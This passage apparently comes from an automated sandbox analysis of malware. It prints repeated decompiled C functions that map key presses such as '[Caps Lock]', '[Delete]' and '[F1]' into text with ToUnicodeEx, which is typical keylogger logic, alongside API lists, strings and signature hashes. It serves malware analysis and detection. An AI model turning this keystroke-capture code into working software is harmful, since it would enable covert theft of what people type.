						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007343
0x10007343
0x1000734a
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[Context Menu], xrefs: 10007345
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Context Menu]
API String ID: 783433895-1701729690
Opcode ID: 5d34866b129b1461d8c55ee51f28b427d56f46fb75139132869c509ee41a27b4
Instruction ID: 9c56b4dc1bb70802c6b761373c7da6d8c422a16c06a74f10d60259aa3dc6bda0
Opcode Fuzzy Hash: 5d34866b129b1461d8c55ee51f28b427d56f46fb75139132869c509ee41a27b4
Instruction Fuzzy Hash: E531C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761

Uniqueness

Uniqueness Score: -1.00%

Function 10007354, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007354(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Caps Lock]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007354
0x10007354
0x1000735b
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Caps Lock], xrefs: 10007356

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Caps Lock]
API String ID: 783433895-928131802
Opcode ID: 490ffde09bfcbb988d4b6b8e85d853c254a7b6d763ca68262fef91c207acda70
Instruction ID: 1db21de267972ec542353e6ccb0e08bd67032bee9118580e561326deec9e72ff
Opcode Fuzzy Hash: 490ffde09bfcbb988d4b6b8e85d853c254a7b6d763ca68262fef91c207acda70
Instruction Fuzzy Hash: 2231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007365, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007365(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Delete]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007365
0x10007365
0x1000736c
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Delete], xrefs: 10007367

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Delete]
API String ID: 783433895-1730770369
Opcode ID: 400296010eaf9738d0fbc21618fd4f91ee1e467b3b431434bb3075d31a3e91e2
Instruction ID: bb44ce128919629e04e34867fdffb35d74004a6f3688c35cfe140960795f1254
Opcode Fuzzy Hash: 400296010eaf9738d0fbc21618fd4f91ee1e467b3b431434bb3075d31a3e91e2
Instruction Fuzzy Hash: 5C31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007376, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007376(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Arrow Down]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007376
0x10007376
0x1000737d
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

[Arrow Down], xrefs: 10007378
Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Arrow Down]
API String ID: 783433895-3022692989
Opcode ID: f45b26b29b61d5e51fb90bdc8d895315599a8a53428478e9d688cd7bca0c64de
Instruction ID: 02fcabc6e8f29592f11b422fe8cf2b1af30d8c93f08c5ed3910a1be214322d5a
Opcode Fuzzy Hash: f45b26b29b61d5e51fb90bdc8d895315599a8a53428478e9d688cd7bca0c64de
Instruction Fuzzy Hash: 9031BEB8B042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE458B61

Uniqueness

Uniqueness Score: -1.00%

Function 10007387, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007387(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[End]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007387
0x10007387
0x1000738e
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[End], xrefs: 10007389

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[End]
API String ID: 783433895-3192008669
Opcode ID: 8be033b71e6cc91fa7183bd242525b69fd42a60ab2c77db8e333b15f6c02985c
Instruction ID: 877a2d7053b44eef148fc6c70e56ab44244d2a6eb94c84edd50b79bcd33e9510
Opcode Fuzzy Hash: 8be033b71e6cc91fa7183bd242525b69fd42a60ab2c77db8e333b15f6c02985c
Instruction Fuzzy Hash: C431C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007398, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007398(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F1]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007398
0x10007398
0x1000739f
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[F1], xrefs: 1000739A
